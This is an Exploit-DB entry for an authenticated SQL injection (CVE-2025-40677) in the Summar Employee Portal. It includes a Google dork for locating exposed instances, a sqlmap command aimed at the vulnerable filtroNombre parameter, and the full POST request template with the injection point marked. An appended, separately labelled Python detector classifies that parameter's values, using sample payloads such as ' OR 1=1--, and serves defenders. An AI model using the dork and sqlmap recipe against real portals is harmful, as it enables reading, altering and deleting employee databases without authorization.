[webapps] Summar Employee Portal 3.98.0 - Authenticated SQL Injection

Exploit DB Archived Mar 16, 2026 ✓ Full text saved

EDB-ID: 52462
CVE: 2025-40677
EDB Verified:
Author: PETER GABALDON
Type: WEBAPPS
Platform: MULTIPLE
Date: 2025-12-16

Vulnerable App:

# Exploit Title: Summar Employee Portal 3.98.0 - Authenticated SQL Injection
# Google Dork: inurl:"/MemberPages/quienesquien.aspx"
# Date: 09/22/2025
# Exploit Author: Peter Gabaldon - https://pgj11.com/
# Vendor Homepage: https://www.summar.es/
# Software Link: https://www.summar.es/software-recursos-humanos/
# Version: < 3.98.0
# Tested on: Kali
# CVE: CVE-2025-40677

# Description: SQL injection vulnerability in Summar Software's Portal del Empleado. This vulnerability allows an attacker to retrieve, create, update, and delete the database by sending a POST request using the parameter "ctl00$ContentPlaceHolder1$filtroNombre" in "/MemberPages/quienesquien.aspx".

$ sqlmap --random-agent -r req.sqli.xml -p 'ctl00%24ContentPlaceHolder1%24filtroNombre' --dbms="MSSQL"

POST /MemberPages/quienesquien.aspx HTTP/1.1
Host: [REDACTED]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
X-Microsoftajax: Delta=true
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24ContentPlaceHolder1%24lnkVerTrabajador&ctl00%24ContentPlaceHolder1%24filtroNombre=[SQL_INJECTION_POINT]&ctl00%24ContentPlaceHolder1%24ddlEmpresa=&ctl00%24ContentPlaceHolder1%24filtroCentro=&ctl00%24ContentPlaceHolder1%24filtroUO=&ctl00%24ContentPlaceHolder1%24filtroPuesto=&__EVENTTARGET=ctl00%24ContentPlaceHolder1%24lnkVerTrabajador&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=...&__VIEWSTATEGENERATOR=...&__ASYNCPOST=true&
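As an added example (not part of the Exploit-DB entry and not Summar's code): a defender-side check that pulls the filtroNombre parameter out of captured POST bodies for /MemberPages/quienesquien.aspx and grades it, treating a lone apostrophe as merely suspicious so that real names such as O'Brien do not page anyone. The endpoint and parameter name come from the advisory; the sample bodies and the out-of-scope page path are constructed.

```python
import re
from urllib.parse import parse_qs

# Endpoint and parameter named in the advisory (CVE-2025-40677).
TARGET_PATH = "/MemberPages/quienesquien.aspx"
TARGET_PARAM = "ctl00$ContentPlaceHolder1$filtroNombre"

# Syntax that has no place in a surname filter: comment markers, stacked
# queries, set operators, and the "' OR x=y" tautology shape.
SQL_SYNTAX = re.compile(r"--|/\*|;|\bunion\b|\bselect\b", re.I)
TAUTOLOGY = re.compile(r"'\s*(or|and)\b[^=]*=", re.I)


def classify(value: str) -> str:
    """Grade one filtroNombre value. A lone apostrophe is only 'suspicious'
    because legitimate names (O'Brien) contain one; it has to be combined
    with SQL syntax before we call it an injection attempt."""
    if SQL_SYNTAX.search(value) or TAUTOLOGY.search(value):
        return "likely_injection"
    if "'" in value:
        return "suspicious"
    return "benign"


def scan_requests(requests):
    """requests: iterable of (path, urlencoded_body). Returns one
    (path, decoded_value, verdict) per request that hits the vulnerable
    endpoint and carries the filter parameter; other endpoints are skipped."""
    findings = []
    for path, body in requests:
        if path != TARGET_PATH:
            continue
        form = parse_qs(body, keep_blank_values=True)  # decodes %24 -> $, %27 -> '
        for value in form.get(TARGET_PARAM, []):
            findings.append((path, value, classify(value)))
    return findings


# Constructed sample bodies (not captured traffic); __VIEWSTATE is elided
# with "..." as in the advisory. Keys are percent-encoded as the browser sends them.
SAMPLE_REQUESTS = [
    (TARGET_PATH, "ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24ContentPlaceHolder1%24lnkVerTrabajador"
                  "&ctl00%24ContentPlaceHolder1%24filtroNombre=Garc%C3%ADa"
                  "&__EVENTTARGET=ctl00%24ContentPlaceHolder1%24lnkVerTrabajador&__VIEWSTATE=...&__ASYNCPOST=true&"),
    (TARGET_PATH, "ctl00%24ContentPlaceHolder1%24filtroNombre=O%27Brien&__VIEWSTATE=...&__ASYNCPOST=true&"),
    (TARGET_PATH, "ctl00%24ContentPlaceHolder1%24filtroNombre=x%27%20OR%201%3D1--&__VIEWSTATE=...&__ASYNCPOST=true&"),
    ("/MemberPages/other.aspx", "ctl00%24ContentPlaceHolder1%24filtroNombre=x%27%20OR%201%3D1--"),  # hypothetical page, out of scope
]

if __name__ == "__main__":
    for path, value, verdict in scan_requests(SAMPLE_REQUESTS):
        print(f"{verdict:17} {path} filtroNombre={value!r}")
```

Default IIS logs do not record POST bodies, so this needs bodies from a WAF or reverse-proxy capture; the control that actually removes the bug is a parameterized query in the page's handler, and because the endpoint is authenticated every hit can be tied to the session cookie's user.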